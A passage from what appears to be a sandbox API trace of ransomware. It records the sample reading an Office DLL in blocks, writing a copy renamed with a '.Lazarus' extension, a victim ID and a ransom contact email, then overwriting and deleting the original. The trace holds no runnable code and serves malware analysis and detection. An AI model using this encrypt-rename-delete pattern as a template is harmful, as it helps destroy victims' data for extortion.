(HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0101.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0101.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0101.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0101.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0101.850] AreFileApisANSI () returned 1 [0101.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0101.850] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0101.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.850] AreFileApisANSI () returned 1 [0101.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0101.850] GetLastError () returned 0x0 [0101.850] SetLastError (dwErrCode=0x0) [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x570e0 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0101.850] GetLastError () returned 0x0 [0101.850] SetLastError (dwErrCode=0x0) [0101.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0101.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5f798 [0101.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.851] AreFileApisANSI () returned 1 [0101.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 167 [0101.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14e) returned 0x5e870 [0101.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5f798, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=167 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 167 [0101.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.851] GetFileType (hFile=0x368) returned 0x1 [0101.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0101.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0101.852] AreFileApisANSI () returned 1 [0101.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0101.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.852] GetFileType (hFile=0x27c) returned 0x1 [0101.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0101.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0101.852] GetLastError () returned 0x0 [0101.852] SetLastError (dwErrCode=0x0) [0101.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0101.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.852] GetLastError () returned 0x0 [0101.852] SetLastError (dwErrCode=0x0) [0101.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0101.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0101.853] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0101.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0101.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0101.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x996d8 [0101.856] GetLastError () returned 0x0 [0101.856] SetLastError (dwErrCode=0x0) [0101.856] GetLastError () returned 0x0 [0101.856] SetLastError (dwErrCode=0x0) [0101.856] GetLastError () returned 0x0 [0101.856] SetLastError (dwErrCode=0x0) [0101.856] GetLastError () returned 0x0 [0101.856] SetLastError (dwErrCode=0x0) [0101.856] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.856] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.857] GetLastError () returned 0x0 [0101.857] SetLastError (dwErrCode=0x0) [0101.858] GetLastError () returned 0x0 [0101.858] SetLastError (dwErrCode=0x0) [0101.858] GetLastError () returned 0x0 [0101.858] SetLastError (dwErrCode=0x0) [0101.858] GetLastError () returned 0x0 [0101.858] SetLastError (dwErrCode=0x0) [0101.858] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.858] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.858] GetLastError () returned 0x0 [0101.858] SetLastError (dwErrCode=0x0) [0101.858] GetLastError () returned 0x0 [0101.858] SetLastError (dwErrCode=0x0) [0101.859] GetLastError () returned 0x0 [0101.859] SetLastError (dwErrCode=0x0) [0101.859] GetLastError () returned 0x0 [0101.859] SetLastError (dwErrCode=0x0) [0101.859] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.859] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.859] GetLastError () returned 0x0 [0101.859] SetLastError (dwErrCode=0x0) [0101.859] GetLastError () returned 0x0 [0101.859] SetLastError (dwErrCode=0x0) [0101.859] GetLastError () returned 0x0 [0101.859] SetLastError (dwErrCode=0x0) [0101.860] GetLastError () returned 0x0 [0101.860] SetLastError (dwErrCode=0x0) [0101.860] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x8c0, lpOverlapped=0x0) returned 1 [0101.860] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.860] GetLastError () returned 0x0 [0101.860] SetLastError (dwErrCode=0x0) [0101.860] GetLastError () returned 0x0 [0101.860] SetLastError (dwErrCode=0x0) [0101.860] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0101.860] GetLastError () returned 0x0 [0101.860] SetLastError (dwErrCode=0x0) [0101.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0101.861] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327ef70*=0x8c0, lpOverlapped=0x0) returned 1 [0101.861] GetLastError () returned 0x0 [0101.861] SetLastError (dwErrCode=0x0) [0101.861] GetLastError () returned 0x0 [0101.861] SetLastError (dwErrCode=0x0) [0101.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0101.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0101.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0101.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x996d8 | out: hHeap=0x20000) returned 1 [0101.861] CloseHandle (hObject=0x368) returned 1 [0101.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0101.862] CloseHandle (hObject=0x27c) returned 1 [0101.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0101.862] AreFileApisANSI () returned 1 [0101.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0101.862] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.863] GetFileType (hFile=0x27c) returned 0x1 [0101.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0101.864] GetLastError () returned 0xb7 [0101.864] SetLastError (dwErrCode=0xb7) [0101.864] WriteFile (in: hFile=0x27c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0101.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0101.865] CloseHandle (hObject=0x27c) returned 1 [0101.865] AreFileApisANSI () returned 1 [0101.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0101.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0101.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0101.865] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll")) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0101.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.867] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4a3, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1e, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x20304, cFileName="\x02", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧胐\x07̧비聐蚨\x08賂̧")) returned 0 [0101.867] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0101.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0101.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0101.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0101.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0101.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0101.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0101.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0101.868] AreFileApisANSI () returned 1 [0101.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform", lpUsedDefaultChar=0x0) returned 80 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0101.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0101.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0101.868] AreFileApisANSI () returned 1 [0101.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0101.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0101.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform") returned 80 [0101.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform" (normalized: "c:\\program files\\common 